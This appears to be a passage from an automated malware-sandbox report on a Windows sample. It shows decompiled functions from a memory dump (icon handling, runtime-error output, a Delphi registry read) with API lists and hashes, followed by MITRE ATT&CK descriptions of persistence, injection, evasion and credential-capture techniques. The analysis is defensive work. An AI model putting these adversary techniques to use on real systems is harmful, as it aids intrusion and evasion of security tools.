											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								E004061E0(_v52, CopyImage(_t369, 0, _t294, _t376, 0x2000), __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}

0x00406639
0x0040663b
0x00406644
0x00406647
0x0040664a
0x0040664d
0x00406651
0x00406657
0x00406660
0x00406661
0x00406663
0x00406665
0x00406665
0x00406668
0x00406677
0x0040667c
0x0040667f
0x00406b1c
0x00406b25
0x00406685
0x0040668f
0x00406697
0x004066a3
0x004066af
0x004066b4
0x004066b5
0x004066ba
0x004066bd
0x004066c3
0x004066c7
0x00406877
0x0040687a
0x0040687c
0x0040687e
0x00406aeb
0x00406aeb
0x00406aed
0x00406af0
0x00406af3
0x00406afb
0x00406b03
0x00406b10
0x00406884
0x00406884
0x00406884
0x00406885
0x00406888
0x00406892
0x00406895
0x00406898
0x004068a0
0x004068a3
0x004068a5
0x004068b1
0x004068be
0x004068c3
0x004068c9
0x004068d9
0x004068de
0x004068e5
0x004068e8
0x004068eb
0x004068ed
0x004068f1
0x004068f1
0x004068f3
0x004068f3
0x004068f6
0x0040690a
0x0040690d
0x00406912
0x0040691f
0x0040691f
0x00406927
0x00406939
0x0040693e
0x00406943
0x00406946
0x00406954
0x00406959
0x0040695c
0x00406968
0x0040696a
0x00406a08
0x00406a12
0x00406970
0x00406981
0x00406986
0x0040698a
0x0040698d
0x004069a0
0x004069a0
0x004069a3
0x004069e1
0x004069a5
0x004069a5
0x004069a8
0x004069ed
0x004069ed
0x004069a8
0x0040698f
0x0040698f
0x004069d5
0x00406991
0x00406991
0x00406991
0x00406992
0x004069b1
0x00406994
0x00406994
0x00406994
0x00406997
0x004069bd
0x00406999
0x00406999
0x0040699c
0x004069c9
0x004069c9
0x0040699c
0x00406997
0x00406992
0x0040698f
0x0040698d
0x00406a1a
0x00406a1e
0x00406a89
0x00406a9d
0x00406aa7
0x00406ab0
0x00406ac0
0x00406acb
0x00406ad0
0x00406ad2
0x00000000
0x00406ad4
0x00406ad4
0x00000000
0x00406ad4
0x00406a20
0x00406a37
0x00406a45
0x00406a47
0x00406a58
0x00406a69
0x00406a75
0x00406a7a
0x00406a7b
0x00406a7d
0x00000000
0x00406a7f
0x00406a7f
0x00000000
0x00406a7f
0x00406a49
0x00406a49
0x00000000
0x00406a49
0x00406a47
0x0040695e
0x0040695e
0x00000000
0x0040695e
0x004068a7
0x004068a7
0x004068ab
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ab
0x00000000
0x00406adb
0x00406adb
0x00406ade
0x00406ae2
0x00406ae2
0x00406ae2
0x00406ae2
0x00000000
0x00406895
0x004066cd
0x004066ce
0x004066d4
0x004066d7
0x004066da
0x004066e2
0x004066e7
0x00000000
0x00000000
0x00406700
0x00406705
0x0040670b
0x00406713
0x0040671f
0x0040671f
0x0040672e
0x00406733
0x00406738
0x0040673d
0x0040675c
0x0040676b
0x00406770
0x00406789
0x0040678e
0x00406792
0x00406796
0x004067b1
0x004067b1
0x004067c2
0x004067c5
0x004067d7
0x004067dd
0x004067f4
0x004067f9
0x004067fd
0x004067df
0x004067e4
0x004067e9
0x004067e9
0x004067c7
0x004067cc
0x004067d1
0x004067d1
0x00406798
0x00406798
0x0040679d
0x00000000
0x0040679f
0x0040679f
0x004067a3
0x004067ab
0x004067ab
0x0040679d
0x0040673f
0x0040673f
0x0040673f
0x00406813
0x0040681d
0x00406826
0x0040683c
0x00406842
0x00406858
0x00406867
0x0040686a
0x0040686e
0x0040686e
0x0040686e
0x00406871
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685a
0x0040685a
0x00000000
0x0040685a
0x00000000
0x00406858
0x00000000
0x004066d7
0x004066c7
0x00000000

APIs

GetObjectA.GDI32(?,00000018,?), ref: 00406700
GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
GetObjectA.GDI32(?,00000018,?), ref: 004068BE
CopyImage.USER32 ref: 00406977
CopyImage.USER32 ref: 004069FE
CopyImage.USER32 ref: 00406752

Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2

Part of subcall function 00406154: GetDC.USER32(00000000), ref: 00406177
Part of subcall function 00406154: CreateDIBSection.GDI32(00000000,?,00000000,00000041,00000000,00000000), ref: 00406192
Part of subcall function 00406154: ReleaseDC.USER32(00000000,00000000), ref: 0040619D

CopyImage.USER32 ref: 00406A93

Strings

(, xrefs: 004068DE

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Object$CopyImage$CreateReleaseSection
String ID: (
API String ID: 1382064897-3887548279
Opcode ID: b87f20a83175f2906a7489a7fbf9040407ae31a25fa5465e07b5007ee3421fdb
Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
Opcode Fuzzy Hash: b87f20a83175f2906a7489a7fbf9040407ae31a25fa5465e07b5007ee3421fdb
Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}

0x00402f20
0x00402f80
0x00402f90
0x00402f90
0x00402f96
0x00402f22
0x00402f2b
0x00402f3b
0x00402f3b
0x00402f57
0x00402f78
0x00402f78

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00402F57
GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F6C
WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?), ref: 00402F72
MessageBoxA.USER32 ref: 00402F90

Strings

Error, xrefs: 00402F84
Runtime error at 00000000, xrefs: 00402F4A, 00402F89

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E

Uniqueness

Uniqueness Score: -1.00%

Function 0040184C, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x0
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x40a5d4
					while(_t19 != 0x40a5d4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x0
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}

0x0040184d
0x00401857
0x0040192b
0x0040185d
0x0040185f
0x00401860
0x00401865
0x00401868
0x00401872
0x00401874
0x00401879
0x00401879
0x0040187e
0x00401885
0x0040188b
0x00401892
0x00401897
0x004018b1
0x004018a6
0x004018aa
0x004018af
0x004018af
0x004018be
0x004018c8
0x004018d2
0x004018d7
0x004018de
0x004018e2
0x004018e9
0x004018ee
0x004018f3
0x004018f9
0x004018fc
0x004018ff
0x0040190b
0x0040190d
0x00401912
0x00401912
0x00401917
0x0040191c
0x00401921
0x00401921

APIs

RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
LocalFree.KERNEL32(00000000,00000000,00401922), ref: 0040188B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018AA
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018E9
RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 00401912
RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040191C

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 02c6954cbcb64e56162da80bdf3b7417e68cd6eb195c9a2433517f3198adb53e
Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
Opcode Fuzzy Hash: 02c6954cbcb64e56162da80bdf3b7417e68cd6eb195c9a2433517f3198adb53e
Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}

0x00402839
0x0040283b
0x00402845
0x00402861
0x004028b0
0x004028c2
0x004028c5
0x004028ce
0x00402863
0x00402865
0x00402866
0x0040286b
0x0040286e
0x00402871
0x0040288d
0x00402894
0x00402897
0x0040289a
0x004028a8
0x004028a8

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
RegQueryValueExA.ADVAPI32 ref: 0040288D
RegCloseKey.ADVAPI32(?), ref: 004028A3

Strings

FPUMaskValue, xrefs: 00402884
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402850

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C

Uniqueness

Uniqueness Score: -1.00%

Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}

0x00406520
0x00406527
0x0040652c
0x00406530
0x00406535
0x00406537
0x0040653c
0x00406540
0x00406551
0x0040655a
0x0040655d
0x00406563
0x00406566
0x00406566
0x0040656b
0x00406571
0x00000000
0x00406574
0x00406571
0x0040653c
0x0040657e

APIs

Part of subcall function 004064E4: DestroyCursor.USER32 ref: 004064F3

GetIconInfo.USER32 ref: 00406540
GetObjectA.GDI32(?,00000018,?), ref: 00406551
DeleteObject.GDI32(?), ref: 00406566
DeleteObject.GDI32(?), ref: 00406574

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Object$Delete$CursorDestroyIconInfo
String ID:
API String ID: 3133107492-0
Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9

Uniqueness

Uniqueness Score: -1.00%

Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					if(E00406638(_v28, _v16, E00403970()) == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}

0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b61
0x00406b62
0x00406b67
0x00406b6a
0x00406b6d
0x00406b72
0x00406bbc
0x00406bc4
0x00406bcd
0x00406bdc
0x00406be4
0x00406be9
0x00406beb
0x00406bec
0x00406bf3
0x00406bf6
0x00406c00
0x00406c08
0x00406c10
0x00406c19
0x00406c1d
0x00406c20
0x00406c23
0x00406c23
0x00406bf6
0x00406c3d
0x00406c47
0x00406c47
0x00406c54
0x00406c58
0x00406c5a
0x00406c5b
0x00406c62
0x00406c68
0x00406c6d
0x00406c70
0x00406c70
0x00406c75
0x00406c78
0x00406c78
0x00406c62
0x00406b74
0x00406b74
0x00406b75
0x00406b7c
0x00406b7f
0x00406b8e
0x00406b92
0x00406b94
0x00406bb3
0x00406bb3
0x00406bb6
0x00406bb9
0x00406bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b96
0x00406b96
0x00406b9a
0x00406b9d
0x00406bad
0x00406bb0
0x00406bb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bb1
0x00406b9d
0x00000000
0x00406b94
0x00406b7f
0x00406c7b
0x00406c7d
0x00406c80
0x00406c83
0x00406c8b
0x00406c96

APIs

GetIconInfo.USER32 ref: 00406C00
DeleteObject.GDI32(?), ref: 00406C70

Strings

,k@, xrefs: 00406BD6, 00406C8B

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeleteIconInfoObject
String ID: ,k@
API String ID: 2689914137-1053005162
Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

